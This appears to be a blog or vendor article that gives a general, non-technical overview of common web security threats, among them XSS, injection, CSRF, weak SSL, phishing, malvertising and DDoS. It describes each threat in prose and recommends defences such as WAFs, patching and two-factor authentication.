With the advent of the internet and its greatly expanded accessibility and connectivity, cyber security has been confronted with new challenges. Security used to be seen as something to be tackled with a multi-layered approach. However, these layers are now so blurred and extended that they no longer exist, so to speak.
Web security is moving outwards, from the browser to web servers and web API-based applications – and back again. The result is a universe of freely moving data that requires a multitude of controls to protect this data, the systems and also the people.
Websites and browsers can be like open doors for cybercriminals who exploit software vulnerabilities to inject malicious code or shut down websites. In this post, we’ll cover some of the common threats to our web health, as well as the consequences and remedies for each.
Software vulnerabilities
Building websites and the advanced web services needed to connect across the internet requires software whose underlying code is potentially exposed to vulnerability attacks. In addition, the proliferation of content management systems such as WordPress and Joomla, along with their extended application environment through modules, plugins and themes, has created new entry points that impact web security.
One of the most common types of attack is cross-site scripting, also known as an XSS attack. The XSS attack is a form of injection attack. It allows the hacker to “inject” a piece of JavaScript into a legitimate web application. This causes the application to deliver unauthorized content when a user accesses it. CMS community code – for example plugins – is a notorious vector for XSS. An active XSS attack can compromise a user account on a website by hijacking the user’s web session and cookies. Jetpack, one of the most popular WordPress plugins, had an XSS vulnerability that affected millions of users.
Software vulnerabilities can be found in pretty much any software code. But certain practices can minimize the impact. Good secure coding practices can eliminate many potential vulnerabilities. The Open Web Application Security Program (OWASP) offers an excellent guide on this topic. Another way to minimize the risk of XSS is to use a Web Application Firewall (WAF). In addition, it is fundamental for a secure web that new software patches are installed immediately.
Database injection attack
Data drives the internet and poses the greatest risk, as cybercriminals are increasingly targeting Personally Identifiable Information (PII). The numbers illustrate this: in 2014, the US experienced an all-time record of confidential data breaches, a 27.5% increase over 2013.
Cybercriminals look at all aspects of web security to gain access. One way is through the databases that store data and login credentials for user accounts. Databases are a fundamental technology for the Internet. Everything is stored in them in one form or another.
The risk of an injection attack exists regardless of whether SQL (e.g. MS SQL) or NoSQL (e.g. MongoDB) is used. Injection attacks occur when data is entered but not filtered. Accordingly, a cybercriminal can use poorly filtered form fields on a website to execute malicious code when accessing the database. As a result, the content of the database is left to the hacker who is already waiting. A special secure coding practice and the use of a WAF can help here.
Database Exploitation
The storage of data within the web context is also an area that can be misconfigured to the detriment of user data. PCI Compliance, for example, was developed to counter threats to the storage of detailed financial information. Nevertheless, this was not enough in the case of JPMorgan Chase: in 2014, 83 million customer accounts were exposed without protection. Inadequately implemented server authentication also played a role here (see also Web Access Controls and the human factor). The PCI Security Standards Council now also recommends the use of a WAF to better protect web applications against such attacks. Database security is a separate topic. However, the discussion also includes strong two-factor or multi-factor authentication and a deeper understanding of how database encryption is used correctly.
Insufficiently implemented SSL
Most websites that need to handle sensitive data (such as login credentials or personal data) are configured so that the standard security protocol Secure Sockets Layer (SSL) or – as a newer term – Transport Layer Security (TLS) can be used. This establishes an HTTPS-based, secure Internet connection. The problem is that the protocol can be incorrectly configured during implementation and subsequently easily hacked. An example of this would be providing the login page without SSL. There is some Wi-Fi hacking equipment that can be purchased cheaply. Equipment such as the Wi-Fi Pineapple – itself a legitimate PEN testing tool – can be used to hack poorly configured SSL services to gain user credentials and access to user accounts.
Cross-site request forgery
Cross-site request forgery (CSRF) is another common type of attack. Let’s assume, for example, that a user is directed to a website prepared by cybercriminals with the CSRF exploit and then opens a legitimate site, e.g. an e-commerce site, where they have a user account. Since the e-commerce site is open during the same browser session, the fake site can use a FORM POST to launch the CSRF attack via the user’s browser, into the backend of the web application to which the user is connected. The hacker can then act as they wish, for example transferring money to their own bank account.
Fortunately, there are ways to avoid this type of attack – in the backend or with a third-party tool, e.g. a WAF. This includes the use of captchas or hidden tokens. Another important aspect is sensitizing users to risks.
Web Access Controls and the human factor
Access control for user accounts on a web application is an increasingly developing field. Password fatigue is making itself felt at the same time as rapidly increasing cybercrime and identity theft.
If you analyze some of the biggest incidents of the last two years, it is noticeable that stolen credentials are at the beginning of a cyber attack. In fact, according to several studies and the Verizon Data Breach Investigations Report, up to 80% of incidents can be attributed to stolen credentials. In addition, stolen credentials also play a major role in data breaches, including financial information. Web-based attack vectors are often used in credential theft. Due to the openness and accessibility of the Internet, human-related points of contact have increased enormously. It almost seems as if everyone is an “insider threat”. Social engineering is a phenomenon that has emerged in recent years with the spread of phishing and spear phishing and the associated fake websites. Social engineering hacks are arguably one of the attacks that are extremely difficult to counter, as human behavior plays a role. Spear phishing in particular is proving to be especially successful. In a Spear Phishing Attacks Report (2014), the security company FireEye states that spear phishing emails had an open rate of 70% and that 50% of users clicked through to a fake website. The use of two-factor authentication is an effective means of mitigating the risks associated with stolen credentials.
Malvertising
Malvertising is still a fairly new phenomenon in the field of cyber threats. Cybercriminals use online advertisements to infect the devices of those who visit the website via a browser. Malvertising is a growing threat. Google had to remove 350 million “bad ads” from the DoubleClick network last year. Many were ransomware, one of the darkest variants of malware, used to extort up to $1000 from infected users.
DoS attacks
Denial of Service (DoS) or Distributed Denial of Service (DDoS) attacks mean that an attacker floods websites with requests, causing the service to become unavailable. The latter method, DDoS, uses a method known as a “botnet”. This is malware that has been secretly installed in advance on many devices of unsuspecting users. A “botnet herder” then activates the malware to flood a specific website and paralyze it. This method has also been used by hacktivists and also by the Chinese government against the US government. It is also used as a diversionary tactic to allow cybercriminals to inject malware into an organization while it is busy fixing the DDoS attack.
Web security: Freedoms need to be defended…
The Internet has given us incredible freedom of communication and access to many services. With great innovations also come challenges. Web security is one of them. The distributed nature of the internet also means that we need to be more innovative to protect these distributed resources. The correct implementation of web applications and their extended hosting infrastructure helps to protect stored data as well as data in transit. Furthermore, the proper use of tools such as Web Application Firewalls (WAF) helps to address the challenges posed by modern web hacking techniques – those methods that attempt to exploit the open and interconnected nature of the Internet. Developing a robust security strategy requires knowledge and insight into the truly critical aspects of web security and how cybercriminals exploit vulnerabilities. With the correct use of implementation standards and the right tools, we can ensure that our websites and services are secure and that data protection and privacy are maintained.